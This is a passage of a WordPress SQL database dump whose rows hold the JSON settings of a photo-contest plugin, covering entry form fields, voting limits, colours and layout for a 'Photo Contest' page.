08:58:38','{\"id\":\"900\",\"contest\":{\"form\":{\"fields\":[{\"uid\":\"ee5c8322-a7e6-49eb-a322-9c084e1f36fe\",\"type\":\"text\",\"name\":\"field\",\"label\":\"Name\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"c7fa3447-49c0-4c91-bd3e-da389293e284\",\"type\":\"text\",\"name\":\"field_copy\",\"label\":\"Email\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"e2800e39-e84b-445f-b23e-69e6509adbd3\",\"type\":\"number\",\"name\":\"field_copy_copy\",\"label\":\"Mobile Number\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"},{\"uid\":\"6f0f286e-b3d5-4730-b3bc-bd48f3a05dde\",\"type\":\"image\",\"name\":\"field_copy_copy_copy\",\"label\":\"Insert Image\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"}]},\"submissions\":{\"requiresApproval\":false,\"title\":\"Submission\",\"subtitle\":\"{{votes}} Votes | {{views}} Views\",\"content\":\"\",\"preview\":{\"source\":\"field_copy_copy_copy\",\"default\":\"\"},\"perPage\":9,\"blocks\":{\"enabled\":true,\"submissions\":[{\"uid\":\"0aa0c292-691b-4916-9c2b-5b47bc7f9f89\",\"type\":\"image\",\"source\":\"contents.field_copy_copy_copy.attachment.url\",\"fallback\":\"\"},{\"uid\":\"3042d58a-97a7-4db3-8b8f-56fd102ef100\",\"type\":\"title\",\"expressions\":[{\"uid\":\"67ca9573-d330-4b6a-9992-aaa4ca823cda\",\"type\":\"val\",\"source\":\"Submission #\"},{\"uid\":\"2522c0fd-85d7-4549-8cad-6993e01ec80b\",\"type\":\"var\",\"source\":\"id\"}]},{\"uid\":\"bd818d5a-ec0d-4e69-b777-a3656dff51ef\",\"type\":\"subtitle\",\"expressions\":[{\"uid\":\"4264813d-4698-4925-ab5c-990853a62715\",\"type\":\"var\",\"source\":\"votesWithLabel\"},{\"uid\":\"d2601afb-c511-4026-ae12-1679c3d740b9\",\"type\":\"val\",\"source\":\" | \"},{\"uid\":\"878581b8-39d1-4acc-8b37-3196303977cc\",\"type\":\"var\",\"source\":\"viewsWithLabel\"}]}],\"submission\":[{\"uid\":\"56788872-e95c-46b1-b4b2-94fe4139c705\",\"type\":\"image\",\"source\":\"contents.field_copy_copy_copy.attachment.url\",\"fallback\":\"\"}]}},\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":2,\"timeout\":3600}},\"menu\":{\"items\":[{\"id\":\"home\",\"label\":\"\"},{\"id\":\"participate\",\"label\":\"\"},{\"id\":\"submissions\",\"label\":\"\"},{\"id\":\"pages\",\"label\":\"\"}],\"default\":\"participate\"},\"pages\":{\"landing\":{\"title\":\"\",\"content\":\"\"},\"participate\":{\"title\":\"\",\"content\":\"\"},\"submissions\":{\"title\":\"\",\"content\":\"\"},\"thankyou\":{\"voting\":{\"content\":\"Your vote has been casted. Thank you!\"},\"submission\":{\"content\":\"Thank you for participating in this contest!\"}},\"default\":\"participate\",\"other\":[{\"id\":\"terms\",\"title\":\"Terms\",\"content\":\"\",\"collapsed\":true}]},\"design\":{\"template\":\"basic-template\",\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"none\"},\"colors\":{\"primary\":\"#1e73be\",\"primaryContrast\":\"#ffffff\",\"primaryDark\":\"#07457c\",\"secondary\":\"#81d742\",\"secondaryContrast\":\"#ffffff\",\"secondaryDark\":\"#489b0d\",\"accent\":\"#dd9933\",\"accentContrast\":\"#ffffff\",\"accentDark\":\"#925802\",\"dark\":\"#333333\",\"white\":\"#ffffff\",\"gray\":\"#dddddd\",\"grayDark\":\"#aaaaaa\",\"grayLight\":\"#eeeeee\",\"grayLighter\":\"#fafafa\"},\"custom\":{\"container\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"\",\"color\":\"\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"toolbar\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"menu\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"},\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"}},\"message\":{\"colors\":{\"background\":\"#ecf0f1\",\"color\":\"#333333\",\"border\":\"#ecf0f1\",\"backgroundError\":\"#c0392b\",\"colorError\":\"#ffffff\",\"borderError\":\"#c0392b\"},\"border\":{\"width\":\"0\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"button\":{\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"borderHover\":\"\",\"backgroundPrimary\":\"\",\"colorPrimary\":\"\",\"borderPrimary\":\"\",\"backgroundPrimaryHover\":\"\",\"colorPrimaryHover\":\"\",\"borderPrimaryHover\":\"\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"1\",\"align\":\"center\",\"transform\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"left\":\"1em\",\"bottom\":\"1em\"},\"shadows\":{\"box\":\"inset 0 1px 0 rgba(255, 255, 255, 0.15), 0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"contentPage\":{\"colors\":{\"color\":\"#333333\",\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"form\":{\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"inherit\",\"color\":\"#333333\"},\"label\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0.5em\",\"left\":\"0\"},\"colors\":{\"color\":\"inherit\"}},\"input\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"colors\":{\"color\":\"\",\"background\":\"#ffffff\",\"border\":\"\",\"colorHover\":\"\",\"backgroundHover\":\"#ffffff\",\"borderHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"},\"shadows\":{\"box\":\"inset 0 3px 0 rgba(0, 0, 0, 0.05)\"}},\"file\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"2px\",\"style\":\"dashed\",\"radius\":\"4px\"},\"padding\":{\"top\":\"3em\",\"right\":\"3em\",\"bottom\":\"3em\",\"left\":\"3em\"},\"colors\":{\"color\":\"inherit\",\"background\":\"inherit\",\"border\":\"#bbbbbb\"}},\"error\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"transparent\",\"color\":\"#f44336\"}}},\"submission\":{\"colors\":{\"background\":\"#ffffff\",\"color\":\"inherit\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"lineHeight\":\"inherit\",\"fontSize\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}}},\"layout\":{\"type\":\"grid\",\"maxWidth\":\"100%\",\"columns\":3,\"gutter\":\"1rem\"},\"behaviours\":{\"ajax\":true,\"scrollUp\":true},\"effects\":{\"transition\":\"fade\",\"duration\":\"500\"},\"css\":\"\"},\"share\":{\"websites\":null},\"vote\":{\"type\":\"count\",\"scale\":5,\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":1,\"perItem\":1,\"perCategory\":0,\"timeout\":3600},\"criteria\":[{\"name\":\"Rating\"}]},\"notifications\":{\"email\":{\"recipient\":\"wp@dxpsites.com\"},\"submission\":{\"new\":true}},\"meta\":{\"schema\":\"1.1\"},\"presetUid\":\"86ba124f0b0799b8e65b9f74726d295b\"}','Photo Contest','','inherit','closed','closed','','900-revision-v1','','','2022-02-09 14:28:38','2022-02-09 08:58:38','',900,'https://mangomitra.in/?p=909',0,'revision','',0),(910,1,'2022-02-09 14:29:49','2022-02-09 08:59:49','{\"id\":\"900\",\"contest\":{\"form\":{\"fields\":[{\"uid\":\"ee5c8322-a7e6-49eb-a322-9c084e1f36fe\",\"type\":\"text\",\"name\":\"field\",\"label\":\"Name\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"c7fa3447-49c0-4c91-bd3e-da389293e284\",\"type\":\"text\",\"name\":\"field_copy\",\"label\":\"Email\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"e2800e39-e84b-445f-b23e-69e6509adbd3\",\"type\":\"number\",\"name\":\"field_copy_copy\",\"label\":\"Mobile Number\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"},{\"uid\":\"6f0f286e-b3d5-4730-b3bc-bd48f3a05dde\",\"type\":\"image\",\"name\":\"field_copy_copy_copy\",\"label\":\"Insert Image\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"}]},\"submissions\":{\"requiresApproval\":false,\"title\":\"Submission{{name}}\",\"subtitle\":\"{{votes}} Votes | {{views}} Views\",\"content\":\"\",\"preview\":{\"source\":\"field_copy_copy_copy\",\"default\":\"\"},\"perPage\":9,\"blocks\":{\"enabled\":true,\"submissions\":[{\"uid\":\"0aa0c292-691b-4916-9c2b-5b47bc7f9f89\",\"type\":\"image\",\"source\":\"contents.field_copy_copy_copy.attachment.url\",\"fallback\":\"\"},{\"uid\":\"3042d58a-97a7-4db3-8b8f-56fd102ef100\",\"type\":\"title\",\"expressions\":[{\"uid\":\"67ca9573-d330-4b6a-9992-aaa4ca823cda\",\"type\":\"val\",\"source\":\"Submission #\"},{\"uid\":\"2522c0fd-85d7-4549-8cad-6993e01ec80b\",\"type\":\"var\",\"source\":\"id\"}]},{\"uid\":\"bd818d5a-ec0d-4e69-b777-a3656dff51ef\",\"type\":\"subtitle\",\"expressions\":[{\"uid\":\"4264813d-4698-4925-ab5c-990853a62715\",\"type\":\"var\",\"source\":\"votesWithLabel\"},{\"uid\":\"d2601afb-c511-4026-ae12-1679c3d740b9\",\"type\":\"val\",\"source\":\" | \"},{\"uid\":\"878581b8-39d1-4acc-8b37-3196303977cc\",\"type\":\"var\",\"source\":\"viewsWithLabel\"}]}],\"submission\":[{\"uid\":\"56788872-e95c-46b1-b4b2-94fe4139c705\",\"type\":\"image\",\"source\":\"contents.field_copy_copy_copy.attachment.url\",\"fallback\":\"\"}]}},\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":2,\"timeout\":3600}},\"menu\":{\"items\":[{\"id\":\"home\",\"label\":\"\"},{\"id\":\"participate\",\"label\":\"\"},{\"id\":\"submissions\",\"label\":\"\"},{\"id\":\"pages\",\"label\":\"\"}],\"default\":\"participate\"},\"pages\":{\"landing\":{\"title\":\"\",\"content\":\"\"},\"participate\":{\"title\":\"\",\"content\":\"\"},\"submissions\":{\"title\":\"\",\"content\":\"\"},\"thankyou\":{\"voting\":{\"content\":\"Your vote has been casted. Thank you!\"},\"submission\":{\"content\":\"Thank you for participating in this contest!\"}},\"default\":\"participate\",\"other\":[{\"id\":\"terms\",\"title\":\"Terms\",\"content\":\"\",\"collapsed\":true}]},\"design\":{\"template\":\"basic-template\",\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"none\"},\"colors\":{\"primary\":\"#1e73be\",\"primaryContrast\":\"#ffffff\",\"primaryDark\":\"#07457c\",\"secondary\":\"#81d742\",\"secondaryContrast\":\"#ffffff\",\"secondaryDark\":\"#489b0d\",\"accent\":\"#dd9933\",\"accentContrast\":\"#ffffff\",\"accentDark\":\"#925802\",\"dark\":\"#333333\",\"white\":\"#ffffff\",\"gray\":\"#dddddd\",\"grayDark\":\"#aaaaaa\",\"grayLight\":\"#eeeeee\",\"grayLighter\":\"#fafafa\"},\"custom\":{\"container\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"\",\"color\":\"\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"toolbar\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"menu\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"},\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"}},\"message\":{\"colors\":{\"background\":\"#ecf0f1\",\"color\":\"#333333\",\"border\":\"#ecf0f1\",\"backgroundError\":\"#c0392b\",\"colorError\":\"#ffffff\",\"borderError\":\"#c0392b\"},\"border\":{\"width\":\"0\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"button\":{\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"borderHover\":\"\",\"backgroundPrimary\":\"\",\"colorPrimary\":\"\",\"borderPrimary\":\"\",\"backgroundPrimaryHover\":\"\",\"colorPrimaryHover\":\"\",\"borderPrimaryHover\":\"\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"1\",\"align\":\"center\",\"transform\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"left\":\"1em\",\"bottom\":\"1em\"},\"shadows\":{\"box\":\"inset 0 1px 0 rgba(255, 255, 255, 0.15), 0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"contentPage\":{\"colors\":{\"color\":\"#333333\",\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"form\":{\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"inherit\",\"color\":\"#333333\"},\"label\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0.5em\",\"left\":\"0\"},\"colors\":{\"color\":\"inherit\"}},\"input\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"colors\":{\"color\":\"\",\"background\":\"#ffffff\",\"border\":\"\",\"colorHover\":\"\",\"backgroundHover\":\"#ffffff\",\"borderHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"},\"shadows\":{\"box\":\"inset 0 3px 0 rgba(0, 0, 0, 0.05)\"}},\"file\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"border\":{\"width\":\"2px\",\"style\":\"dashed\",\"radius\":\"4px\"},\"padding\":{\"top\":\"3em\",\"right\":\"3em\",\"bottom\":\"3em\",\"left\":\"3em\"},\"colors\":{\"color\":\"inherit\",\"background\":\"inherit\",\"border\":\"#bbbbbb\"}},\"error\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\"},\"colors\":{\"background\":\"transparent\",\"color\":\"#f44336\"}}},\"submission\":{\"colors\":{\"background\":\"#ffffff\",\"color\":\"inherit\",\"border\":\"#dddddd\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"lineHeight\":\"inherit\",\"fontSize\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}}},\"layout\":{\"type\":\"grid\",\"maxWidth\":\"100%\",\"columns\":3,\"gutter\":\"1rem\"},\"behaviours\":{\"ajax\":true,\"scrollUp\":true},\"effects\":{\"transition\":\"fade\",\"duration\":\"500\"},\"css\":\"\"},\"share\":{\"websites\":null},\"vote\":{\"type\":\"count\",\"scale\":5,\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":1,\"perItem\":1,\"perCategory\":0,\"timeout\":3600},\"criteria\":[{\"name\":\"Rating\"}]},\"notifications\":{\"email\":{\"recipient\":\"wp@dxpsites.com\"},\"submission\":{\"new\":true}},\"meta\":{\"schema\":\"1.1\"},\"presetUid\":\"86ba124f0b0799b8e65b9f74726d295b\"}','Photo Contest','','inherit','closed','closed','','900-autosave-v1','','','2022-02-09 14:29:49','2022-02-09 08:59:49','',900,'https://mangomitra.in/?p=910',0,'revision','',0),(911,1,'2022-02-09 14:29:39','2022-02-09 08:59:39','{\"id\":\"900\",\"contest\":{\"form\":{\"fields\":[{\"uid\":\"ee5c8322-a7e6-49eb-a322-9c084e1f36fe\",\"type\":\"text\",\"name\":\"field\",\"label\":\"Name\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"c7fa3447-49c0-4c91-bd3e-da389293e284\",\"type\":\"text\",\"name\":\"field_copy\",\"label\":\"Email\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"e2800e39-e84b-445f-b23e-69e6509adbd3\",\"type\":\"number\",\"name\":\"field_copy_copy\",\"label\":\"Mobile Number\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"},{\"uid\":\"6f0f286e-b3d5-4730-b3bc-bd48f3a05dde\",\"type\":\"image\",\"name\":\"field_copy_copy_copy\",\"label\":\"Insert Image\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"}]},\"submissions\":{\"requiresApproval\":false,\"title\":\"Submission{{name}}\",\"subtitle\":\"{{votes}} Votes | {{views}} Views\",\"content\":\"\",\"preview\":{\"source\":\"field_copy_copy_copy\",\"default\":\"\"},\"perPage\":9,\"blocks\":{\"enabled\":true,\"submissions\":[{\"uid\":\"0aa0c292-691b-4916-9c2b-5b47bc7f9f89\",\"type\":\"image\",\"source\":\"contents.field_copy_copy_copy.attachment.url\",\"fallback\":\"\"},{\"uid\":\"3042d58a-97a7-4db3-8b8f-56fd102ef100\",\"type\":\"title\",\"expressions\":[{\"uid\":\"67ca9573-d330-4b6a-9992-aaa4ca823cda\",\"type\":\"val\",\"source\":\"Submission #\"},{\"uid\":\"2522c0fd-85d7-4549-8cad-6993e01ec80b\",\"type\":\"var\",\"source\":\"id\"}]},{\"uid\":\"bd818d5a-ec0d-4e69-b777-a3656dff51ef\",\"type\":\"subtitle\",\"expressions\":[{\"uid\":\"4264813d-4698-4925-ab5c-990853a62715\",\"type\":\"var\",\"source\":\"votesWithLabel\"},{\"uid\":\"d2601afb-c511-4026-ae12-1679c3d740b9\",\"type\":\"val\",\"source\":\" | \"},{\"uid\":\"878581b8-39d1-4acc-8b37-3196303977cc\",\"type\":\"var\",\"source\":\"viewsWithLabel\"}]}],\"submission\":[{\"uid\":\"56788872-e95c-46b1-b4b2-94fe4139c705\",\"type\":\"image\",\"source\":\"contents.field_copy_copy_copy.attachment.url\",\"fallback\":\"\"}]}},\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":2,\"timeout\":3600}},\"menu\":{\"items\":[{\"id\":\"home\",\"label\":\"\"},{\"id\":\"participate\",\"label\":\"\"},{\"id\":\"submissions\",\"label\":\"\"},{\"id\":\"pages\",\"label\":\"\"}],\"default\":\"participate\"},\"pages\":{\"landing\":{\"title\":\"\",\"content\":\"\"},\"participate\":{\"title\":\"\",\"content\":\"\"},\"submissions\":{\"title\":\"\",\"content\":\"\"},\"thankyou\":{\"voting\":{\"content\":\"Your vote has been casted. Thank you!\"},\"submission\":{\"content\":\"Thank you for participating in this contest!\"}},\"default\":\"participate\",\"other\":[{\"id\":\"terms\",\"title\":\"Terms\",\"content\":\"\",\"collapsed\":true}]},\"design\":{\"template\":\"basic-template\",\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"none\"},\"colors\":{\"primary\":\"#1e73be\",\"primaryContrast\":\"#ffffff\",\"primaryDark\":\"#07457c\",\"secondary\":\"#81d742\",\"secondaryContrast\":\"#ffffff\",\"secondaryDark\":\"#489b0d\",\"accent\":\"#dd9933\",\"accentContrast\":\"#ffffff\",\"accentDark\":\"#925802\",\"dark\":\"#333333\",\"white\":\"#ffffff\",\"gray\":\"#dddddd\",\"grayDark\":\"#aaaaaa\",\"grayLight\":\"#eeeeee\",\"grayLighter\":\"#fafafa\"},\"custom\":{\"container\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"\",\"color\":\"\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"toolbar\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 0.05)\"}},\"menu\":{\"text\":{\"align\":\"inherit\",\"transform\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"},\"colors\":{\"background\":\"\",\"color\":\"\",\"border\":\"\",\"backgroundHover\":\"\",\"colorHover\":\"\",\"colorActive\":\"\",\"backgroundActive\":\"\",\"borderActive\":\"\"}},\"message\":{\"colors\":{\"background\":\"#ecf0f1\",\"color\":\"#333333\",\"border\":\"#ecf0f1\",\"backgroundError\":\"#c0392b\",\"colorError\":\"#ffffff\",\"borderError\":\"#c0392b\"},\"border\":{\"width\":\"0\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"1em\",\"right\":\"1em\",\"bottom\":\"1em\",\"left\":\"1em\"},\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"inherit\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 